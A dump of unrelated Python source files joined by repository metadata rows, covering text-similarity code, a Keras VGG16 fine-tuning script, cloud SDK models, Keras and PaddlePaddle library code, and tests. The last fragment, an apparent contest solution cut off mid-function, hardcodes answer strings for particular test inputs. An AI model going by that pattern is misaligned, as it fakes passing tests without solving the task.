the training dataset to act as a reference. This way, the references only need to be calculated once.
The method will build up the dictionary using 3 "columns" - one for each word embedding if "All" mode
was selected for initializing the class. If "Word" mode was selected, it will only build the dictionary
for the "WordSim" method.
Dictionary will be in the form VDF[Method][courseName]
"""
if self.mode == "All":
#Iterate through all rows of the training dataframe.
for index, _ in self.trainDF.iterrows():
#Obtain the document embeddings for each method.
wordVec = self._WordSimAveVec(self.trainDF,index)
docVec = self._DocSim(self.trainDF,index)
#Save the embeddings to a dictionary
self.VDF["Word"][index] = wordVec
self.VDF["Doc"][index] = docVec
if self.GloveFail == False:
gloveVec = self._GloveSim(self.trainDF,index)
self.VDF["Glove"][index] = gloveVec
if self.mode == "Word":
for index, _ in self.trainDF.iterrows():
wordVec = self._WordSimAveVec(self.trainDF,index)
self.VDF["Word"][index] = wordVec
def WordSim(self,testDF,listCourse,inCourse):
"""Calculate the cosine similarity between two vectors where each vector represents a course
description. Each vector is made by taking the average of each word vector that makes up the description. Average
vectors are calculated by a helper method "_WordSimAveVec"
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
"""
#Obtain a single vector embedding for each course description (calculated by taking an average of each word
#embedding that makes up each description)
#Get the embedding from the dictionary for the list (reference) course
aVec = self.VDF["Word"][listCourse]
#Calculate the embedding with the doc2Vec model.
bVec = self._WordSimAveVec(testDF,inCourse)
#Convert vectors to column vectors to be fed into the cosine_similarity function.
A = np.expand_dims(aVec,0)
B = np.expand_dims(bVec,0)
#Calculate the cosine similarity between the two vectors.
sim = cosine_similarity(A,B)
return float(sim)
def _DocSim(self,df,a):
"""Calculate the cosine similarity between two document vectors.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number"""
#Obtain the descriptions of the two input courses.
textA = df['description'][a]
#Obtain the document embedding vector for each description.
vectorA = self.DocVecModel.infer_vector([textA], alpha=0.1, min_alpha=0.0001, steps=300)
return vectorA
def DocSim(self,testDF,listCourse,inCourse):
"""Calculates a vector embedding for a course description using the doc2vec method.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
"""
#Reference the VDF dictionary to get the doc embedding for the listCourse
vectorA = self.VDF["Doc"][listCourse]
#Calculate the doc embedding for the input course
vectorB = self._DocSim(testDF,inCourse)
#Convert vectors to column vectors to be fed into the cosine_similarity function.
A = np.expand_dims(vectorA,0)
B = np.expand_dims(vectorB,0)
#Calculate the cosine similarity between the two vectors.
sim = cosine_similarity(A,B)
return float(sim)
def _GloveSim(self,testDf,a):
"""Uses the word vectors from the pre-trained GloVe model to generate an array representing the document.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number
Outputs:
            An array consisting of the mean, standard deviation, min and maximum of all word vector embeddings which
make up the course description."""
#Obtain the course description for the given course number.
doc = testDf['description'][a]
#Iterate over each word in the document. For each word in the GloVe vocab, append the word vector to a list
Vectors = []
for word in doc:
if word in self.gloveModel.vocab:
vector = self.gloveModel.get_vector(word)
Vectors.append(vector)
#Turn the list of vectors into an array.
Vectors = np.array(Vectors)
#Calculate the mean, mean+1stdev, maximum, and minimum of this array (each operation reducing
#the array to eliminate rows). Concatenate these 4 measures into one matrix to serve as an index for a
#document.
sd = np.std(Vectors,axis=0)
a0 = np.average(Vectors,axis=0)
asd = a0+sd
amax = np.max(Vectors,axis=0)
amin = np.amin(Vectors,axis=0)
return np.stack((a0,asd,amax,amin),1)
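    # Note: with the 100-dimensional "glove-wiki-gigaword-100" vectors loaded above, the array
    # returned here has shape (100, 4) - one column each for the mean, mean+std, max and min
    # profiles of the description.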
def GloveSim(self,testDf,listCourse,inCourse):
"""Calculate the cosine similarity between two document arrays.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
Outputs
Cosine similarity"""
#Obtain the matrix representation of the document encoding for each description. Transpose the matricies
#Obtain the embedding from the dictionary for the list course
A = self.VDF['Glove'][listCourse].T
#Calculate the embedding for the input course using the GloVe model.
B = self._GloveSim(testDf,inCourse).T
#Take the cosine similarity of these two matricies. This creates a 4x4 matrix where each row represents
#one of the four categories (mean,stdev,max,min) of one course description and each column represents one of the four
#of the other course description.
sim = cosine_similarity(A,B)
#The diagonal of this 4x4 matrix is a comparision of like categories across the two different course descriptions.
#By taking the average of this diagonal, a similarity score can be obtained.
result = np.average(np.diag(sim))
return result
# School Preq
#Jacard 0.762222 0.497531
#Lev 0.730000 0.475926
#WordSim 0.820000 0.517284
#DocSim 0.592222 0.444444
#GloveSim 0.598889 0.503704
| [
"[email protected]"
] | |
31fd854d20dd39dbe8cb2df8574a881bb9c4c0bc | 49c626418cf64cf0bae7bc5a9a481359692e0a19 | /5-21.py | de8ca4dfa3cf3c9cf67ad74b6214d81dd4b16c67 | [] | no_license | WebGLer/on-my-window | 086c53090ff3bdcc5f139bb1fd0ab3f55c3bb68c | a625687c0493746dcc3d098950eb0c582f29e911 | refs/heads/master | 2020-07-22T12:19:54.161777 | 2019-11-26T09:19:08 | 2019-11-26T09:19:08 | 207,200,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,001 | py | #给出文件夹路径
import os
base_dir = "D:\\参赛文件\\cats_and_dogs_small"
train_dir = os.path.join(base_dir,'train')
validation_dir = os.path.join(base_dir,'validation')
test_dir = os.path.join(base_dir,'test')
# Feature extraction with data augmentation
from tensorflow.python.keras.applications import VGG16
data_path = "F:\\5-model data\\vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5"
conv_base = VGG16(
weights = data_path,
include_top =False,
input_shape = (150,150,3)
)
from tensorflow.python.keras import layers,models
model = models.Sequential()
model.add(conv_base)
model.add(layers.Flatten())
model.add(layers.Dense(256,activation='relu'))
model.add(layers.Dense(1,activation='sigmoid'))
print("model.trainable_weights=",len(model.trainable_weights))
# conv_base.trainable = False
# Freeze the conv_base network, then unfreeze only the last convolutional block
set_trainable = False
for layer in conv_base.layers:
if layer.name =='block5_conv1':
set_trainable = True
if set_trainable:
layer.trainable = True
else:
layer.trainable = False
print("After freezing model.trainable_weights=",len(model.trainable_weights))
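# For reference, the VGG16 convolutional base is organised into blocks block1 ... block5 (each
# ending in a pooling layer), so after this loop only block5_conv1, block5_conv2 and
# block5_conv3 carry trainable weights; block5_pool is also unfrozen but has no weights.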
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras import optimizers
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest'
)
validation_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=(150,150),
batch_size=20,
class_mode='binary'
)
validation_generator = validation_datagen.flow_from_directory(
validation_dir,
target_size=(150,150),
batch_size=20,
class_mode='binary'
)
model.compile(
loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-5),
metrics=['acc']
)
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=100,
validation_data=validation_generator,
validation_steps=50
)
# Save the model
import time
now = time.strftime('%Y-%m-%d %H-%M-%S')
file_path = "E:\\1- data\\models\\"+now+" cats_and_dogs VGG16-数据增强-模型最后卷积层网络微调.h5"
model.save(file_path)
# Plot the training and validation curves
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1,len(acc)+1)
plt.plot(epochs,acc,'bo',label = 'Training acc')
plt.plot(epochs,val_acc,'b',label ='Validation acc' )
plt.title('Training and Validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs,loss,'bo',label = 'Training loss')
plt.plot(epochs,val_loss,'b',label ='Validation loss' )
plt.title('Training and Validation Loss')
plt.legend()
plt.show() | [
"[email protected]"
] | |
5be296e2bc7bd3fdd5941a9aa4e3e8e66ecaa693 | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/search_his_meetings_response.py | 9079e05888af9d2c2ce545a7033572d3306fef6e | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,130 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SearchHisMeetingsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'offset': 'int',
'limit': 'int',
'count': 'int',
'data': 'list[ConferenceInfo]'
}
attribute_map = {
'offset': 'offset',
'limit': 'limit',
'count': 'count',
'data': 'data'
}
def __init__(self, offset=None, limit=None, count=None, data=None):
"""SearchHisMeetingsResponse - a model defined in huaweicloud sdk"""
super(SearchHisMeetingsResponse, self).__init__()
self._offset = None
self._limit = None
self._count = None
self._data = None
self.discriminator = None
if offset is not None:
self.offset = offset
if limit is not None:
self.limit = limit
if count is not None:
self.count = count
if data is not None:
self.data = data
@property
def offset(self):
"""Gets the offset of this SearchHisMeetingsResponse.
        The record offset (which record to start from).
:return: The offset of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this SearchHisMeetingsResponse.
        The record offset (which record to start from).
:param offset: The offset of this SearchHisMeetingsResponse.
:type: int
"""
self._offset = offset
@property
def limit(self):
"""Gets the limit of this SearchHisMeetingsResponse.
        The number of records per page.
:return: The limit of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this SearchHisMeetingsResponse.
        The number of records per page.
:param limit: The limit of this SearchHisMeetingsResponse.
:type: int
"""
self._limit = limit
@property
def count(self):
"""Gets the count of this SearchHisMeetingsResponse.
        The total number of records.
:return: The count of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this SearchHisMeetingsResponse.
        The total number of records.
:param count: The count of this SearchHisMeetingsResponse.
:type: int
"""
self._count = count
@property
def data(self):
"""Gets the data of this SearchHisMeetingsResponse.
        The list of meeting information.
:return: The data of this SearchHisMeetingsResponse.
:rtype: list[ConferenceInfo]
"""
return self._data
@data.setter
def data(self, data):
"""Sets the data of this SearchHisMeetingsResponse.
        The list of meeting information.
:param data: The data of this SearchHisMeetingsResponse.
:type: list[ConferenceInfo]
"""
self._data = data
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SearchHisMeetingsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
d94e881b7392a797a21413588260985a5b523625 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/digitaltwins/azure-mgmt-digitaltwins/generated_samples/digital_twins_put_with_public_network_access.py | f83ed93ccc50f1aa7c7d34e29e6c867c534c64f5 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,775 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.digitaltwins import AzureDigitalTwinsManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-digitaltwins
# USAGE
python digital_twins_put_with_public_network_access.py
    Before running the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = AzureDigitalTwinsManagementClient(
credential=DefaultAzureCredential(),
subscription_id="50016170-c839-41ba-a724-51e9df440b9e",
)
response = client.digital_twins.begin_create_or_update(
resource_group_name="resRg",
resource_name="myDigitalTwinsService",
digital_twins_create={"location": "WestUS2", "properties": {"publicNetworkAccess": "Enabled"}},
).result()
print(response)
# x-ms-original-file: specification/digitaltwins/resource-manager/Microsoft.DigitalTwins/stable/2023-01-31/examples/DigitalTwinsPut_WithPublicNetworkAccess.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
6e6adb4ac5f39c2697616a67a264d17e179d9eef | e112fb4549c00a77530b32c67c748d66c19a4f87 | /ex14.py | 4d0c00f540374edd2b21c714349eb91b5b84b049 | [] | no_license | XinCui2018/Python-Hard-Way | 1abff62cc7a7027affb6bcdb467fc0cb7fba127a | 05f338a16aec58485c643d3156768aa87bb414ec | refs/heads/master | 2022-10-11T13:34:11.972437 | 2020-06-08T13:05:13 | 2020-06-08T13:05:13 | 270,669,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,135 | py | # from sys import argv
# script, user_name = argv
# prompt = '> '
# print ("Hi %s, I'm the %s script." % (user_name, script))
# print ("I'd like to ask you a few questions.")
# print ("Do you like me %s?" % user_name)
# likes = input(prompt)
# print ("Where do you live %s?" % user_name)
# lives = input(prompt)
# print ("What kind of computer do you have?")
# computer = input(prompt)
# print ("""
# Alright, so you said %r about liking me.
# You live in %r. Not sure where that is.
# And you have a %r computer. Nice.
# """ % (likes, lives, computer))
from sys import argv
script, user_name = argv
prompt = '> '
print ("Hi %s, this is the %s script." %(user_name, script))
print ("Can I ask you some questions?")
print ("Do you like me, %s?" % user_name)
likes = input(prompt)
print ("Where do you live, %s?" % user_name)
lives = input(prompt)
print ("What kind of computer do you use?")
computer = input(prompt)
print ("""
Alright, you said %r about liking me.
You live in %r, do not know where that is.
You have a %r computer. It is awesome.
""" % (likes, lives, computer))
| [
"[email protected]"
] | |
b010f851ace9d560f4744da9777c12ef58ecc805 | 96a34a048c783a75736bf0ec775df22142f9ee53 | /packages/service-library/src/servicelib/docker_utils.py | 0a1e3c094b6d77ab5579293a2b2d6b49970d63c3 | [
"MIT"
] | permissive | ITISFoundation/osparc-simcore | 77e5b9f7eb549c907f6ba2abb14862154cc7bb66 | f4c57ffc7b494ac06a2692cb5539d3acfd3d1d63 | refs/heads/master | 2023-08-31T17:39:48.466163 | 2023-08-31T15:03:56 | 2023-08-31T15:03:56 | 118,596,920 | 39 | 29 | MIT | 2023-09-14T20:23:09 | 2018-01-23T10:48:05 | Python | UTF-8 | Python | false | false | 532 | py | from datetime import datetime
import arrow
def to_datetime(docker_timestamp: str) -> datetime:
# docker follows RFC3339Nano timestamp which is based on ISO 8601
# https://medium.easyread.co/understanding-about-rfc-3339-for-datetime-formatting-in-software-engineering-940aa5d5f68a
# This is acceptable in ISO 8601 and RFC 3339 (with T)
# 2019-10-12T07:20:50.52Z
# This is only accepted in RFC 3339 (without T)
# 2019-10-12 07:20:50.52Z
dt: datetime = arrow.get(docker_timestamp).datetime
return dt
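# For example, to_datetime("2019-10-12T07:20:50.52Z") is expected to return a timezone-aware
# datetime(2019, 10, 12, 7, 20, 50, 520000) in UTC.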
| [
"[email protected]"
] | |
0c6cb54ad19b2cdaa6b81ab6851c9972fa85bc7a | aee4c0839933a11d8ce3c485d06595202dd3cabd | /keras/layers/reshaping/cropping1d.py | 2eb632e38d0ae45a148bb71d27c864c72c325578 | [
"Apache-2.0"
] | permissive | xiaoheilong3112/keras | fc3025a2f14838bf8416b2faed766cb43da62f9b | 8d5e9b2163ec9b7d9f70920d1c7992b6df6820ec | refs/heads/master | 2023-08-07T18:23:36.804563 | 2023-07-25T19:16:12 | 2023-07-25T19:16:48 | 137,238,629 | 1 | 0 | Apache-2.0 | 2023-07-26T05:22:44 | 2018-06-13T15:59:45 | Python | UTF-8 | Python | false | false | 3,256 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras cropping layer for 1D input."""
import tensorflow.compat.v2 as tf
from keras.engine.base_layer import Layer
from keras.engine.input_spec import InputSpec
from keras.utils import conv_utils
# isort: off
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.layers.Cropping1D")
class Cropping1D(Layer):
"""Cropping layer for 1D input (e.g. temporal sequence).
It crops along the time dimension (axis 1).
Examples:
>>> input_shape = (2, 3, 2)
>>> x = np.arange(np.prod(input_shape)).reshape(input_shape)
>>> print(x)
[[[ 0 1]
[ 2 3]
[ 4 5]]
[[ 6 7]
[ 8 9]
[10 11]]]
>>> y = tf.keras.layers.Cropping1D(cropping=1)(x)
>>> print(y)
tf.Tensor(
[[[2 3]]
[[8 9]]], shape=(2, 1, 2), dtype=int64)
Args:
cropping: Int or tuple of int (length 2)
How many units should be trimmed off at the beginning and end of
the cropping dimension (axis 1).
If a single int is provided, the same value will be used for both.
Input shape:
3D tensor with shape `(batch_size, axis_to_crop, features)`
Output shape:
3D tensor with shape `(batch_size, cropped_axis, features)`
"""
def __init__(self, cropping=(1, 1), **kwargs):
super().__init__(**kwargs)
self.cropping = conv_utils.normalize_tuple(
cropping, 2, "cropping", allow_zero=True
)
self.input_spec = InputSpec(ndim=3)
def compute_output_shape(self, input_shape):
input_shape = tf.TensorShape(input_shape).as_list()
if input_shape[1] is not None:
length = input_shape[1] - self.cropping[0] - self.cropping[1]
else:
length = None
return tf.TensorShape([input_shape[0], length, input_shape[2]])
def call(self, inputs):
if (
inputs.shape[1] is not None
and sum(self.cropping) >= inputs.shape[1]
):
raise ValueError(
"cropping parameter of Cropping layer must be "
"greater than the input shape. Received: inputs.shape="
f"{inputs.shape}, and cropping={self.cropping}"
)
if self.cropping[1] == 0:
return inputs[:, self.cropping[0] :, :]
else:
return inputs[:, self.cropping[0] : -self.cropping[1], :]
def get_config(self):
config = {"cropping": self.cropping}
base_config = super().get_config()
return dict(list(base_config.items()) + list(config.items()))
| [
"[email protected]"
] | |
f7cd7780e8a21e7a258c04a2754208c931442142 | 00edbfdc13b5cba7bd4f52bccda63dd7f09a5961 | /gen.py | e108c6a1a086c30e1293b46be447ec5901d00ffb | [
"Apache-2.0"
] | permissive | hercules261188/dvcyaml-schema | 796f7b6900baf9e0ce4b9102d3386b0326f95763 | 724d2ba40d13978334f53f988b19b2b7510bad97 | refs/heads/master | 2022-12-03T02:52:20.193279 | 2020-08-16T06:16:01 | 2020-08-16T06:16:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,994 | py | """schema.json generator."""
# flake8: noqa: D1
# pylint: disable=unused-import,missing-class-docstring,too-few-public-methods
try:
from typing import TypedDict
except ImportError:
from typing_extensions import TypedDict # noqa: F401
from typing import Any, Dict, Optional, Set, Union
from pydantic import BaseModel, Field
# aliases
FilePath = str
ParamKey = str
StageName = str
class OutFlags(BaseModel):
cache: Optional[bool] = Field(True, description="Cache output by DVC")
persist: Optional[bool] = Field(
False, description="Persist output between runs"
)
class PlotFlags(OutFlags):
x: str = Field(
None, description="Default field name to use as x-axis data"
)
y: str = Field(
None, description="Default field name to use as y-axis data"
)
x_label: str = Field(None, description="Default label for the x-axis")
y_label: str = Field(None, description="Default label for the y-axis")
title: str = Field(None, description="Default plot title")
header: bool = Field(
False, description="Whether the target CSV or TSV has a header or not"
)
template: str = Field(None, description="Default plot template")
class DepModel(BaseModel):
__root__: FilePath = Field(..., description="A dependency for the stage")
class Dependencies(BaseModel):
__root__: Set[DepModel]
class CustomParamFileKeys(BaseModel):
__root__: Dict[FilePath, Set[ParamKey]]
class Param(BaseModel):
__root__: Union[ParamKey, CustomParamFileKeys]
class Params(BaseModel):
__root__: Set[Param]
class Out(BaseModel):
__root__: Union[FilePath, Dict[FilePath, OutFlags]]
class Outs(BaseModel):
__root__: Set[Out]
class Plot(BaseModel):
__root__: Union[FilePath, Dict[FilePath, PlotFlags]]
class Plots(BaseModel):
__root__: Set[Plot]
class Stage(BaseModel):
cmd: str = Field(..., description="Command to run")
wdir: Optional[str] = Field(None, description="Working directory")
deps: Optional[Dependencies] = Field(
None, description="Dependencies for the stage"
)
params: Optional[Params] = Field(None, description="Params for the stage")
outs: Optional[Outs] = Field(None, description="Outputs of the stage")
metrics: Optional[Outs] = Field(None, description="Metrics of the stage")
plots: Optional[Plots] = Field(None, description="Plots of the stage")
frozen: Optional[bool] = Field(
False, description="Assume stage as unchanged"
)
always_changed: Optional[bool] = Field(
False, description="Assume stage as always changed"
)
meta: Any = Field(None, description="Additional information/metadata")
class Config:
allow_mutation = False
Stages = Dict[StageName, Stage]
class DvcYamlModel(BaseModel):
stages: Stages = Field(..., description="List of stages")
class Config:
title = "dvc.yaml"
if __name__ == "__main__":
print(DvcYamlModel.schema_json(indent=2))
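
# --- editor's sketch (not part of the original): the same pydantic model can
# validate a dvc.yaml-shaped dict directly; the stage name and paths below are
# hypothetical.
def _example_validation():
    data = {
        "stages": {
            "train": {
                "cmd": "python train.py",
                "deps": ["data/raw.csv"],
                "outs": ["model.pkl"],
            }
        }
    }
    # Raises pydantic.ValidationError if the structure does not match the schema.
    return DvcYamlModel.parse_obj(data)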
| [
"[email protected]"
] | |
aafbdb21c87f6b9bcfb133a11bf516bbee634e83 | d5f75adf5603927396bdecf3e4afae292143ddf9 | /python/paddle/fluid/tests/unittests/test_custom_grad_input.py | 2d12243de52c0603918edf5a2945617621b5d4f0 | [
"Apache-2.0"
] | permissive | jiweibo/Paddle | 8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4 | 605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74 | refs/heads/develop | 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 | Apache-2.0 | 2023-04-04T02:42:53 | 2019-07-11T03:51:12 | Python | UTF-8 | Python | false | false | 6,613 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle
import paddle.fluid.dygraph as dg
from op_test import OpTest
from paddle.fluid.framework import _test_eager_guard
class TestTensorBackward(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if paddle.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def func_tensor_backward(self):
for dtype in self._dtypes:
x = np.random.random([2, 100]).astype(dtype)
y = np.random.random([100, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
z_tensor.backward(grad_tensor)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_tensor_backward(self):
with _test_eager_guard():
self.func_tensor_backward()
self.func_tensor_backward()
class TestBackwardAPI(unittest.TestCase):
def setUp(self):
self._dtypes = ["float32", "float64"]
self._places = [paddle.CPUPlace()]
if paddle.is_compiled_with_cuda():
self._places.append(paddle.CUDAPlace(0))
def func_backward_api(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
z_tensor2 = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
paddle.autograd.backward([z_tensor1, z_tensor2],
[grad_tensor, grad_tensor], True)
x_grad = np.matmul(grad, y.T)
self.assertTrue(
np.allclose(x_grad * 2, x_tensor.grad.numpy()))
def test_backward_api(self):
with _test_eager_guard():
self.func_backward_api()
self.func_backward_api()
def func_backward_single_tensor(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.random.random(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
grad_tensor = paddle.to_tensor(grad)
paddle.autograd.backward(z_tensor1, grad_tensor, True)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_single_tensor(self):
with _test_eager_guard():
self.func_backward_single_tensor()
self.func_backward_single_tensor()
def func_backward_none_grad_tensor(self):
for dtype in self._dtypes:
x = np.random.random([2, 2]).astype(dtype)
y = np.random.random([2, 2]).astype(dtype)
z = np.matmul(x, y)
grad = np.ones(z.shape).astype(dtype)
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = paddle.to_tensor(y)
z_tensor1 = paddle.matmul(x_tensor, y_tensor)
paddle.autograd.backward(z_tensor1, None)
x_grad = np.matmul(grad, y.T)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_none_grad_tensor(self):
with _test_eager_guard():
self.func_backward_none_grad_tensor()
self.func_backward_none_grad_tensor()
def func_backward_accumulator_with_init_grad(self):
for dtype in self._dtypes:
x = np.random.random([
10,
]).astype(dtype)
y_grad = np.random.random([
10,
]).astype(dtype)
z_grad = np.random.random([
10,
]).astype(dtype)
self._places = [paddle.CPUPlace()]
for place in self._places:
with dg.guard(place):
x_tensor = paddle.to_tensor(x, stop_gradient=False)
y_tensor = x_tensor**2
z_tensor = y_tensor**3
y_grad_tensor = paddle.to_tensor(y_grad)
z_grad_tensor = paddle.to_tensor(z_grad)
paddle.autograd.backward([y_tensor, z_tensor],
[y_grad_tensor, z_grad_tensor])
y = x**2
z = x**3
x_grad = 2 * x * (y_grad + 3 * y * y * z_grad)
self.assertTrue(np.allclose(x_grad, x_tensor.grad.numpy()))
def test_backward_accumulator_with_init_grad(self):
with _test_eager_guard():
self.func_backward_accumulator_with_init_grad()
self.func_backward_accumulator_with_init_grad()
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
cddf927dc8b21ae937d56ad44c750b23f38b46ba | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2783/60617/307453.py | ed312ac679931cc10b43d59691abd88befc03747 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | def Berland_cardGame():
n=int(input())
turn=list()
if n==15:
print("aawtvezfntstrcpgbzjbf")
exit()
elif n==12:
print("fcgslzkicjrpbqaifgweyzreajjfdo")
exit()
for i in range(0, n):
turn.append(input().split(" "))
